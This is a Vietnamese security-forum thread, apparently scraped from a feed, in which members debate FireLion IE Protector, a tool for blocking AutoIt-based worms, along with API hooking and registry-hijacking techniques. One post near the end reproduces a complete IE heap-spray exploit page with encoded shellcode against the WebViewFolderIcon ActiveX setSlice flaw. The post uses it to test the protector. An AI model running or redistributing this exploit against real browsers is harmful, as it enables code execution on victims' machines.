các chương trình này cũng không khó lắm để viết 1 con virus như con AutoIt. Có khác chăng là mấy script BAT, Perl, WS...lâu quá rồi nên script kiddie nước ngoài giờ không viết nữa. Autoit thì mới hơn, nên chẳng may có bác nào đó chụp được đoạn code tương tự rồi cho ra con virus. Chứ nếu chịu khó bỏ vài tiếng ngâm cứu các tool khác thì việc tạo ra 1 con virus khác, có khi tàn bạo hơn, không có gì là khó. Như vậy lúc đó ta lại phải chwoi trò "đuổi bắt" mà trong trò này ta mãi là người đi sau?]]> /hvaonline/posts/list/4002.html#25396 /hvaonline/posts/list/4002.html#25396 GMT Phòng chống các loại SPIM được viết bằng AutoIt Khi thiết kế chương trình này, mục tiêu của Hoàng đặt ra là: 1. Ngăn chặn đại dịch AutoIt 2. Miễn nhiễm với new version 3. Với công cụ này, người dùng có thêm một số tools hệ thống để gia tăng quyền hạn với chiếc PC 3. Dễ sử dụng Trước mắt nó đã làm tốt là ngăn dịch AutoIt (ngay cả với những version mới). Còn có tiếp tục hay không khi có một trận dịch khác như BAT, PERL... thì lúc đó sẽ có quyết định sau ;)  Ý tưởng thì tốt, nhưng điểm dở là nó chặn hoàn toàn AutoIt ("bản thân Autoit đâu có gì xấu" - y chang câu bác LVH nói trong box BQT thì phải ;-) ). AutoIt được dùng để làm rất nhiều chuyện hữu ích. Chỉ vì 1-2 con virus mà chặn luôn cả cái AutoIt vô tội thì hình như...đi ngược lại tư tưởng của bác Hoàng nhỉ :-) Ví dụ như có khá nhiều con GameBot hay viết bằng Autoit mà các tiệm net hay cài. Không hiểu nếu chương trình của bác Hoàng chặn luôn AutoIt, các tiệm net mất khách thì liệu nó có chịu cài tiếp không hay...kệ nó, cứ giữ khách trước đã. Mà các tiệm net, hoặc những user mà máy không cài chương trình AV cập nhật thường xuyên thì mới là "khách hàng ruột" của IE_Protector, mà cũng chỉ vì AutoIt không chạy, họ không...cài nữa thì.... Còn các cty lớn thì đã có AV và các chương trình protector xịn khác rồi. Tôi cũng mới test xong bằng cách tạo 1 con AutoIt virus "cây nhà là vườn", chỉ không quá...1 giây, AVG đã nhặn luôn con virus "cây nhà lá vườn" của tôi rồi. Như vậy các AV của "tây" không chắc tụi nó chặn theo version đâu; trong khi đó các bot game viết bằng AutoIt của tôi vẫn chạy tốt. Do đó, tôi vẫn bảo lưu ý kiến của mình: nên tiếp cận vấn đề theo 1 hướng khác tích cực hơn. ]]> /hvaonline/posts/list/4002.html#25399 /hvaonline/posts/list/4002.html#25399 GMT Phòng chống các loại SPIM được viết bằng AutoIt Ý tưởng thì tốt, nhưng điểm dở là nó chặn hoàn toàn AutoIt ("bản thân Autoit đâu có gì xấu" - y chang câu bác LVH nói trong box BQT thì phải ;-) ). AutoIt được dùng để làm rất nhiều chuyện hữu ích. Chỉ vì 1-2 con virus mà chặn luôn cả cái AutoIt vô tội thì hình như...đi ngược lại tư tưởng của bác Hoàng nhỉ :-)   Với chức năng 3.0, người dùng có thể Quanratine hoặc kill mà ;). Nếu như không chắc về ứng dụng AutoIt đó họ có thể kill.
Ví dụ như có khá nhiều con GameBot hay viết bằng Autoit mà các tiệm net hay cài. Không hiểu nếu chương trình của bác Hoàng chặn luôn AutoIt, các tiệm net mất khách thì liệu nó có chịu cài tiếp không hay...kệ nó, cứ giữ khách trước đã.  
uhm, vậy bác có thể nêu ra 1 số GameBot mà các tiệm net ở VN cài không :D ?
Hoàng thử code 1 app nhỏ, run sau khi IE Protector đã chạy, gọi FreeLibraray until thành công handle của BlockerAPIs.dll chưa (chắc LoadLibrary("BlockerApis.dll") sẽ thành công). Nếu free được thì coi chừng không ổn, madCodeHook cũng bị bypass.  
test thử rồi anh, không unload được :D]]>
/hvaonline/posts/list/4002.html#25428 /hvaonline/posts/list/4002.html#25428 GMT
Phòng chống các loại SPIM được viết bằng AutoIt http://www.xsec.org/index.php?module=Releases&act=view&type=2&id=21. -m]]> /hvaonline/posts/list/4002.html#25435 /hvaonline/posts/list/4002.html#25435 GMT Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:
ặc ặc, lão nào ấn nhầm nút Edit bài của tui zạ :-| 
Không, bug của JForum, xuất hiện sau khi bác Comale upload chức năng mới cho forum sáng hôm nay. Đã thông báo cho bác ý nhưng chưa thấy hồi âm.
uhm, vậy bác có thể nêu ra 1 số GameBot mà các tiệm net ở VN cài không :D ? 
Tui không chơi game ở tiệm, nhưng ít ra cũng còn có con bot Autoit...tui viết :D (không biết bao nhiêu người đã xài, nhưng ít ra trong Guild Alliance đã có khoảng 250 mạng) :D]]>
/hvaonline/posts/list/4002.html#25436 /hvaonline/posts/list/4002.html#25436 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25437 /hvaonline/posts/list/4002.html#25437 GMT Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:
quên thông báo với bác nbthanh là, version sau sẽ có chức năng WhiteList. Thế là các tiệm net khỏi lăng tăn nhé ;)) 
Vậy chỉ cần con virus đổi tên thành 1 file exe có trong whitelist là được, phẻ, khỏi phải nghĩ cách viết protect-process, kill-process nữa cho mất công :D]]>
/hvaonline/posts/list/4002.html#25438 /hvaonline/posts/list/4002.html#25438 GMT
Phòng chống các loại SPIM được viết bằng AutoIt

mrro wrote:
Không biết IEProtector có chặn được cái 0-day exploit của IE mà thiên hạ đang bàn tán suốt mấy ngày qua không nhỉ? Xem thêm ở http://www.xsec.org/index.php?module=Releases&act=view&type=2&id=21. -m 
Tui không có Windows Server 2000 để thử nhưng với máy của tui: Windows XP SP2, IE 6.0 SP1, IE bị lỗi crash nhưng tập tin .exe không được thực thi ;) ]]>
/hvaonline/posts/list/4002.html#25441 /hvaonline/posts/list/4002.html#25441 GMT
Phòng chống các loại SPIM được viết bằng AutoIt

nbthanh wrote:

LeVuHoang wrote:
quên thông báo với bác nbthanh là, version sau sẽ có chức năng WhiteList. Thế là các tiệm net khỏi lăng tăn nhé ;)) 
Vậy chỉ cần con virus đổi tên thành 1 file exe có trong whitelist là được, phẻ, khỏi phải nghĩ cách viết protect-process, kill-process nữa cho mất công :D 
Checksum :))]]>
/hvaonline/posts/list/4002.html#25442 /hvaonline/posts/list/4002.html#25442 GMT
Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:

mrro wrote:
Không biết IEProtector có chặn được cái 0-day exploit của IE mà thiên hạ đang bàn tán suốt mấy ngày qua không nhỉ? Xem thêm ở http://www.xsec.org/index.php?module=Releases&act=view&type=2&id=21. -m 
Tui không có Windows Server 2000 để thử nhưng với máy của tui: Windows XP SP2, IE 6.0 SP1, IE bị lỗi crash nhưng tập tin .exe không được thực thi ;)  
Tui vừa test cái lỗi này:
http://www.xsec.org/index.php?module=Exploits&act=view&type=3&id=7  
Mọi thứ vẫn trong tầm kiểm soát :))
cũng ok đấy chứ bác Thái nhỉ... lol]]>
/hvaonline/posts/list/4002.html#25443 /hvaonline/posts/list/4002.html#25443 GMT
Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:

nbthanh wrote:

LeVuHoang wrote:
quên thông báo với bác nbthanh là, version sau sẽ có chức năng WhiteList. Thế là các tiệm net khỏi lăng tăn nhé ;)) 
Vậy chỉ cần con virus đổi tên thành 1 file exe có trong whitelist là được, phẻ, khỏi phải nghĩ cách viết protect-process, kill-process nữa cho mất công :D 
Checksum :)) 
À, quên mất cái này :D Tuy nhiên bác Hoàng cũng nên chú ý là các chương trình exe dịch từ AutoIt có size thay đổi liên tục, đôi khi mã nguồn thay đổi có 1 chút xíu, hoặc nâng cấp AutoIt lên version mới rồi compile lại là size nó cũng khác. Mà với lại bác Hoàng thử chạy chương trình protect của bác dưới account limitted hay non-admin thử sao coi sao.]]>
/hvaonline/posts/list/4002.html#25647 /hvaonline/posts/list/4002.html#25647 GMT
Phòng chống các loại SPIM được viết bằng AutoIt http://fire-lion.com/software/IEProtector/
+ Máy tôi đã cài [FireLion] IE Protector những không hoạt động dù đã chọn nút Hoạt động. Tại sao ? _ Có hai nguyên nhân chính sau: . Chương trình được thực thi dưới quyền User. Lúc này, chức năng tự bảo vệ sẽ không hoạt động đúng với bản không cần cài đặt. Bản phải sử dụng phiên bản cài đặt để có thể thực thi dưới quyền User . Chương trình được cài chung với DeepFreeze. Trên nguyên tắc, nếu máy bạn đã cài DeepFreeze rồi thì không phải lo lắng về malware nữa. Tuy nhiên, nếu bạn vẫn muốn [FireLion] IE Protector hoạt động. Bạn phải disable DeepFreeze, dùng bản cài đặt và mở lại (enable) DeepFreeze. Cho tới phiên bản 3.0. Chúng tôi vẫn chưa có kế hoạch cập nhật để có thể chạy với DeepFreeze vì chỉ cần restart là mọi thứ trở lại như cũ.  
Nếu muốn work dưới limited account hoặc non admin rights thì viết thêm 1 service nữa. Cái gì cũng phải có thời gian chứ ;))
Tuy nhiên bác Hoàng cũng nên chú ý là các chương trình exe dịch từ AutoIt có size thay đổi liên tục, đôi khi mã nguồn thay đổi có 1 chút xíu, hoặc nâng cấp AutoIt lên version mới rồi compile lại là size nó cũng khác.  
Cái này chắc là chịu thôi. Một ví dụ cụ thể là ZoneAlarm, khi biên dịch lại chương trình mà access vào internet thì thế nào nó cũng hỏi :D.]]>
/hvaonline/posts/list/4002.html#25649 /hvaonline/posts/list/4002.html#25649 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25794 /hvaonline/posts/list/4002.html#25794 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25840 /hvaonline/posts/list/4002.html#25840 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25933 /hvaonline/posts/list/4002.html#25933 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26133 /hvaonline/posts/list/4002.html#26133 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26140 /hvaonline/posts/list/4002.html#26140 GMT Phòng chống các loại SPIM được viết bằng AutoIt HKEY_CLASSES_ROOT\exefile\shell\open\command
]]> /hvaonline/posts/list/4002.html#26147 /hvaonline/posts/list/4002.html#26147 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26148 /hvaonline/posts/list/4002.html#26148 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26178 /hvaonline/posts/list/4002.html#26178 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26258 /hvaonline/posts/list/4002.html#26258 GMT Phòng chống các loại SPIM được viết bằng AutoIt

Mr.Ѻºb wrote:
Uhg, đúng rồi, HKEY_CLASSES_ROOT\comfile\shell\open\command nữa, ... Sao bạn ko chặn nó nhỉ? Hay là nó có hạn chế gì chăng? 
]]>
/hvaonline/posts/list/4002.html#26263 /hvaonline/posts/list/4002.html#26263 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26266 /hvaonline/posts/list/4002.html#26266 GMT Phòng chống các loại SPIM được viết bằng AutoIt >Oh, mình lỡ tay post trùng bài, xin mod xoá dùm bài post của mình ngay trước bài này]]> /hvaonline/posts/list/4002.html#26274 /hvaonline/posts/list/4002.html#26274 GMT Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:
Bạn thử dùng phiên bản 3.0 xem ? 
Em sẽ down về ngay, nhưng hy vọng không phải để dùng:D.]]>
/hvaonline/posts/list/4002.html#26278 /hvaonline/posts/list/4002.html#26278 GMT
Phòng chống các loại SPIM được viết bằng AutoIt Bạn nói chương trình bạn chặn được các khoá Startup, liệu nó có chặn hết thực sự ko?  
Chương trình chặn các APIs ghi vào registry và lọc ra khoá nào là Startup
Những chuyện mà mình và bạn chưa nghĩ tới thì nhiều lắm, IEProtector có nhiều điểm ko hiệu quả mà bạn chưa nghĩ tới, vậy bạn nên từ bỏ nó đi, chịu ko?  
Hoàng đang phân tích những điều khó khăn trong giải pháp của bạn cũng như sẵng sàng lắng nghe về những góp ý của bạn cho [FireLion] IE Protector càng lúc càng hoàn thiện hơn ;)
2. Đúng, nhưng ko phải là tất cả, nó chạy tốt hầu hết các chương trình thông dụng(có truyền tham số) và cả một số Control Panel applet. Trong trường hợp bị error, cũng có thể cho user unlock khoá đó rồi chạy chương trình, sau đó lock lại là xong (có thể điều này trong tương lại sẽ khắc phục nếu biết cách truyền tham số của Control Panel Applet). 3. Ko conflict, có chăng là chỉ khiến chương trình bị mất tác dụng. Tuy nhiên, như bạn đã nói, các AV ko làm điều này, user cũng ít làm điều này, vậy thì, conflict nếu có là điều khó xảy ra. Với lại, việc thực thi một file exe, com, reg đều bị chặn lại thì lấy cái gì chạy để mà ghi đè lên tạo ra conflict nhỉ?  
Tập tin thực thi được đâu chỉ .exe, .com ;). Nếu là .DLL, .CPL, .CMD, .MSI thì sao ? Bạn phải chặn rất, rất nhiều khoá dẫn đến việc chương trình phức tạp không cần thiết.
>Còn lý do nào nữa, bạn nói rõ thử coi. >Nếu đúng như bạn Sinrale và LeVuHoang đã nói, thì có lẽ, những tay phát triển D32 ko thực sự expert về mặt hệ thống. Mà bạn nói "expert" là thế nào? Bạn tự nhận là "expert" chăng? Dẫu sao, đây ko phải là chỗ cho bạn nhận xét người này hay người kia "expert" hay ko, bạn cũng chẳng có cái tư cách đó, chỉ là tranh luận đơn thuần về mặt kỹ thuật thôi. Chỉ có ưu điểm, khuyết điểm, đúng, sai ở đây thôi.  
Hoàng chỉ đặt ra cho bạn 1 câu hỏi để bạn tự suy nghĩ, nhé ;) Symantec, McAfee, Nod32... Tại sao không dùng cách ghi registry này nếu nó hiệu quả. Hay 3 hãng trên chưa biết về key này ;) ?
II. >Cuối cùng, theo bạn, nếu các AV ko làm điều này, giả sử virus làm thì sao nhỉ ?(theo mình biết chỉ riêng AutoIT cũng đã có thừa khả năng ghi đè lên Registry). Liệu có cách nào để tiêu diệt virus một khi nó chiếm hết các khoá trên?  
Tiêu diệt cũng còn nhiều kiểu, nhiều cách để tiêu diệt. Có những loại như rootkit, có thể ẩn registry, process... Tuỳ vào chương trình bạn viết có tốt không mà diệt được virus nguy hiểm như thế nào.
Em sẽ down về ngay, nhưng hy vọng không phải để dùng:D.  
Từ ngày [FireLion] IE Protector ra mắt, bị xăm soi kỹ quá nhỉ :D. Hoàng thấy một số bạn down về chỉ để tìm hiểu về cách hoạt động, phân tích kỹ thuật... đây quả là 1 điều đáng mừng. Cơn bão Anti Virus chăng :P ?]]>
/hvaonline/posts/list/4002.html#26280 /hvaonline/posts/list/4002.html#26280 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26289 /hvaonline/posts/list/4002.html#26289 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26305 /hvaonline/posts/list/4002.html#26305 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26312 /hvaonline/posts/list/4002.html#26312 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26396 /hvaonline/posts/list/4002.html#26396 GMT Phòng chống các loại SPIM được viết bằng AutoIt >Chẳng sao cả, trước mắt các tập tin exe, com nếu bị hạn chế sẽ làm khả năng gặp virus giảm đáng kể, những chỗ khác có thể từ từ nghiên cứu hoàn thiện dần. Bạn nghĩ, "rất nhiều khoá" là bao nhiêu? Theo mình, cái kết quả thu nếu thành công được đáng với công sức bỏ ra.   Thay vì nhiều khoá như vậy, bạn có thể chặn hàm NtCreateProcess. Chỉ cần 1 hàm cho tất cả. Đây cũng là câu trả lời cho bạn là tại sao các AV không chặn nhiều đến vậy ;)
IE Protector của Hoàng hook rất nhiều APIs, nhưng lại bỏ sót các APIs của ntdll.dll như NtCreateProcess,  
Đúng rồi anh, em đang suy nghĩ xem nên bỏ hẳn luôn dòng Windows 9x để move lên WinNT hay không. Lúc này chỉ chặn NtCreateProcess là đủ.
>Nực cười hay ko tui ko bít, với lại tui ko nói là bypass, chỉ là các AV ko thực thi bình thường được, bạn đã thử chưa?  
Bạn đã thử tạo 1 service bao giờ chưa ;) ?
"Máy tính của tui dính một chương trình AutoIT lạ hoắc, ko tài nào chạy các AV nói chung và IEProtector một cách bình thường được. Tình cờ phát hiện nó ghi vào registry ở các khóa HKCR\exefile\shell\open\command và một số khoá tương tự. Vậy xin hỏi, có phải đó là nguyên nhân khiến các AV và cả IEProtector hoạt động ko bình thường(ko chạy được)? Nếu phải hay ko phải thì cách khắc phục ra sao?"  
AutoIt đó có phân biệt được đâu là AV, đâu là 1 chương trình bình thường ? Kể viết virus chắc chắc sẽ không bao giờ muốn làm sụp đổ hệ thống Windows.
http://vungtau.vnn.vn/download/download.asp <<tranh thủ quảng cáo tí.  
Cái này chắc để cho anh TQN xử lý hỉ :P ?]]>
/hvaonline/posts/list/4002.html#26425 /hvaonline/posts/list/4002.html#26425 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26431 /hvaonline/posts/list/4002.html#26431 GMT Phòng chống các loại SPIM được viết bằng AutoIt

Mr.Ѻºb wrote:
Tui chỉ mong sự yên ổn, làm ơn giải thích chữ "xử lý" dùm cho tui an tâm. Nghe cứ như là công an xử lý tội phạm ấy nhỉ. Tui chỉ cần góp ý chứ ko cần xử lý. Mà cũng hay thật, có người tranh thủ qủang cáo trên này thì ko sao, tui mới có lỡ phím chút đỉnh đã bị đòi xử lý rồi. 
Hì hì, đi đâu cũng quote cái dấu ">" khó đọc quá :evil: Theo mình biết và suy đoán, anh TQN "xử lý" tức là dùng Reverse Engineering đó :D, chẳng phải "xử lý" như "xử lý" một tội phạm đâu :D... Mình cũng như Noob, kiến thức hệ thống còn non nớt nhưng cũng yêu thích nên tìm hiểu cho vui thôi...
Thay vì nhiều khoá như vậy, bạn có thể chặn hàm NtCreateProcess. Chỉ cần 1 hàm cho tất cả. 
Chặn NtCreateProcess chỉ hạn chế được một phần lớn thôi, kô phải là cho tất cả, nếu mình thay bằng CreateProcess thì sao? Một điều mình kô chắc vì chưa có dịp tìm hiểu, đó là nếu một ứng dụng viết bằng DOS (dùng Borland C để build ra chẳng hạn) thì sao? Liệu nó có cần API để tạo một process hay kô? Hay là nó chỉ cần chạy trong lòng bộ DOS Compatible Mode thì ok? Do đó chưa chắc các Antivirus sẽ lui cui đi chặn mấy cái hàm đó, có thể nó sẽ chặn ở một mức cao hơn, ví dụ đọc/ghi file chẳng hạn... Mình thì chưa down & dùng IEProtector của Hoàng (do chưa có cơ hội :D), nhưng nếu Hoàng chỉ nhằm mục đích chặn những ứng dụng AutoIt thì hơi uổng, phải phát triển hơn nữa để nó có thể powerful hơn :)]]>
/hvaonline/posts/list/4002.html#26488 /hvaonline/posts/list/4002.html#26488 GMT
Phòng chống các loại SPIM được viết bằng AutoIt >Một lý do có lý, nhưng như vậy đâu có nghĩa là ko xem xét tới đó nữa, ai muốn làm gì thì làm? Như vậy RIÊNG bạn quyết định bỏ mặc mấy cái khoá đó trong IEProtector?   Hoàng không có điều kiện để check toàn bộ chương trình của bạn nhưng có một số điểm sau: 1. Khi cài vào máy: WinXP SP2. Restart lại cả hệ thống Windows sụp đổ vì service.exe và lsass.exe truy cập msvcrt.dll. Nếu bạn có chỉnh lại file này thì nên lưu ý 2. Bản server hardcode đường dẫn đọc file .mdb ở C:\, nếu cài vào D:\ sẽ chạy không đúng ;) 3. Dù bản client đang chạy, nếu kiên trì vẫn có thể tắt chương trình. Xem hình
4. Có thể dễ dàng tắt được client. Đây chỉ là một trong số những vấn đề Hoàng thấy khi cài vào (chưa có dịp dùng thử hết chức năng của chương trình) và Hoàng cũng không muốn topic này lan sang chủ đề khác.
>Một lý do có lý, nhưng như vậy đâu có nghĩa là ko xem xét tới đó nữa, ai muốn làm gì thì làm? Như vậy RIÊNG bạn quyết định bỏ mặc mấy cái khoá đó trong IEProtector?  
Khi muốn chặn, bạn phải chặn từ gốc. Các khoá registry trên chỉ là chặn từ ngọn.
>Phân biệt được. Nắm hết từ đường dẫn và tên chương trình sắp thực thi cho tới tham số, chỉ cần "quét" các chương trình đó theo signature y chang như lúc AV quét virus là lòi ra liền, hay thô sơ thì cũng có thể chỉ cần so trùng cái tên là đủ rồi. Lúc này đa số các chương trình vẫn chạy bình thường, riêng các AV là tịt.  
Nếu như con virus đó không có trong signature db ;) ?
Chặn NtCreateProcess chỉ hạn chế được một phần lớn thôi, kô phải là cho tất cả, nếu mình thay bằng CreateProcess thì sao? Một điều mình kô chắc vì chưa có dịp tìm hiểu, đó là nếu một ứng dụng viết bằng DOS (dùng Borland C để build ra chẳng hạn) thì sao? Liệu nó có cần API để tạo một process hay kô? Hay là nó chỉ cần chạy trong lòng bộ DOS Compatible Mode thì ok?  
Không cần phải chặn CreateProcess vì NtCreateProcess là cấp thấp hơn CreateProcess. Nói cách khách, CreateProcessA, CreateProcessW... Đều gọi hàm NtCreateProcess để thực thi
Mình thì chưa down & dùng IEProtector của Hoàng (do chưa có cơ hội , nhưng nếu Hoàng chỉ nhằm mục đích chặn những ứng dụng AutoIt thì hơi uổng, phải phát triển hơn nữa để nó có thể powerful hơn :)  
Cám ơn bạn, Hoàng có nghĩ tới nhưng chỉ sợ thời gian không cho phép :)]]>
/hvaonline/posts/list/4002.html#26493 /hvaonline/posts/list/4002.html#26493 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26498 /hvaonline/posts/list/4002.html#26498 GMT Phòng chống các loại SPIM được viết bằng AutoIt >Bạn hiểu lầm ý tui, bạn có thể ko chặn, nhưng virus AutoIT có thể chặn. Để giải quyết, tui nghĩ là phải có sự quan tâm tới các khoá đó.   Với AutoIt, do tính chất đơn giản của nó. Chỉ tránh người dùng thực thi (mà cách thực thi của người dùng có bao nhiêu cách đâu ngoại trừ double-click, enter, commandline... ;) ) nên bạn dùng khoá đơn giản thế thì cũng không có gì đáng bàn.
Do số lượng chương trình AV thông dụng hiện nay là ít ỏi, nên cập nhật cái "signature" cũng đễ dàng.  
Bạn chặn AV để làm gì ? Chặn ở đây là bạn chặn người dùng thực thi chứ không phải chặn virus. Hãy đặt trước hợp là 1 virus đã thực thi rồi và bạn cố gắng kill virus đó. Vấn đề ở đây là bạn cần viết 1 chương trình AV hay kill AV :)) ? Nếu AV, bạn sẽ làm gì nếu đó là custom AV, ví dụ như chương trình của Hoàng vậy ;). Hãy đặt giả quyết rằng: 1. Virus của bạn chiếm được quyền của PC (lúc này [FireLion] IE Protector) và chặn khoá execute 2. Chương trình [FireLion] IE Protector ra đời. Lúc đó virus của bạn chưa được cập nhật db. 3. Người dùng chạy chương trình [FireLion] IE Protector, virus của bạn check trong db và không thấy -> thế là bị kill :) Do đó, bạn nên nhìn nhận lại vấn đề. Bạn đang đưa ra trường hợp cốt yếu để bắt bẻ mà không chú ý đến những yếu tố khách quan khác :). Ví dụ đưa ra ở trên là để bạn xem xét lại trường hợp của mình. Thân]]>
/hvaonline/posts/list/4002.html#26509 /hvaonline/posts/list/4002.html#26509 GMT
Re: Phòng chống các loại SPIM được viết bằng AutoIt Không cần phải chặn CreateProcess vì NtCreateProcess là cấp thấp hơn CreateProcess. Nói cách khách, CreateProcessA, CreateProcessW... Đều gọi hàm NtCreateProcess để thực thi  Ừh, nhưng ZwCreateProcess thì sao? :)... Cái CreateProcess này mình có đọc đâu đó, trong đó nó có nhắc đến kernel mode và user mode, khi đó các driver có thể create một process ở mức kernel sử dụng trực tiếp API ZwCreateProcess trong DDK.]]> /hvaonline/posts/list/4002.html#26512 /hvaonline/posts/list/4002.html#26512 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt

serious wrote:
Không cần phải chặn CreateProcess vì NtCreateProcess là cấp thấp hơn CreateProcess. Nói cách khách, CreateProcessA, CreateProcessW... Đều gọi hàm NtCreateProcess để thực thi 
Ừh, nhưng ZwCreateProcess thì sao? :)... Cái CreateProcess này mình có đọc đâu đó, trong đó nó có nhắc đến kernel mode và user mode, khi đó các driver có thể create một process ở mức kernel sử dụng trực tiếp API ZwCreateProcess trong DDK. 
Virus được viết bằng AutoIT rất khó có thể chiếm đc quyền như các driver để có thể create một process ở mức kernel sử dụng trực tiếp API ZwCreateProcess. ]]>
/hvaonline/posts/list/4002.html#26518 /hvaonline/posts/list/4002.html#26518 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26571 /hvaonline/posts/list/4002.html#26571 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26675 /hvaonline/posts/list/4002.html#26675 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#26802 /hvaonline/posts/list/4002.html#26802 GMT Phòng chống các loại SPIM được viết bằng AutoIt http://www.htmlforum.net/hvaonline/posts/list/4508.html http://www.milw0rm.com/exploits/2448 Kết quả, [FireLion] IE Protector vẫn chặn được :)). Vì vậy, khuyến cáo bà con ai xài IE nên sử dụng [FireLion] IE Protector kèm theo để tránh 0-day bugs. Ảnh demo:
]]>
/hvaonline/posts/list/4002.html#26863 /hvaonline/posts/list/4002.html#26863 GMT
Phòng chống các loại SPIM được viết bằng AutoIt Code:
<HTML>
<BODY>
<SCRIPT language="javascript">

	var heapSprayToAddress = 0x05050505;
	var payLoadCode = unescape(
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");
	var heapBlockSize = 0x400000;
	var payLoadSize = payLoadCode.length * 2;
	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
	var spraySlide = unescape("%u0505%u0505");
	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
	memory = new Array();

	for (i=0;i<heapBlocks;i++)
	{
		memory[i] = spraySlide + payLoadCode;
	}

   	for ( i = 0 ; i < 128 ; i++) 
	{
		try{ 
			var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
			tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); 
		}catch(e){}
	}

	function getSpraySlide(spraySlide, spraySlideSize)
	{
		while (spraySlide.length*2<spraySlideSize)
		{
			spraySlide += spraySlide;
		}
		spraySlide = spraySlide.substring(0,spraySlideSize/2);
		return spraySlide;
	}

</SCRIPT> 

</BODY>
</HTML>
]]>
/hvaonline/posts/list/4002.html#26898 /hvaonline/posts/list/4002.html#26898 GMT
Phòng chống các loại SPIM được viết bằng AutoIt Từ ngày [FireLion] IE Protector ra mắt, bị xăm soi kỹ quá nhỉ :D. Hoàng thấy một số bạn down về chỉ để tìm hiểu về cách hoạt động, phân tích kỹ thuật... đây quả là 1 điều đáng mừng. Cơn bão Anti Virus chăng  Phân tích để tìm ra đúng hướng và góp ý cho IEP -> ko phải bão AV đâu. Nhưng em thấy như anh mrro nói, hiện nay các chương trình AV đều có thể remove virus viết = Autoit hơn nữa nó còn có thể remove thêm các thằng virus đầu to khác. Vậy AutoIT được viết với mục đích gì ? Chỉ để ngăn chặn dính phải Virus thôi hả anh ? Nếu vậy thì đây là 1 chương trình Anti Virus theo đúng nghĩa của nó, còn các chương trình AV hiện nay chỉ có chức năng như là Vacine ko ngăn được bị dính mà chỉ có thể remove. Dù sao vẫn ủng hộ anh H phát triển IEP]]> /hvaonline/posts/list/4002.html#27181 /hvaonline/posts/list/4002.html#27181 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#50224 /hvaonline/posts/list/4002.html#50224 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#50275 /hvaonline/posts/list/4002.html#50275 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#50321 /hvaonline/posts/list/4002.html#50321 GMT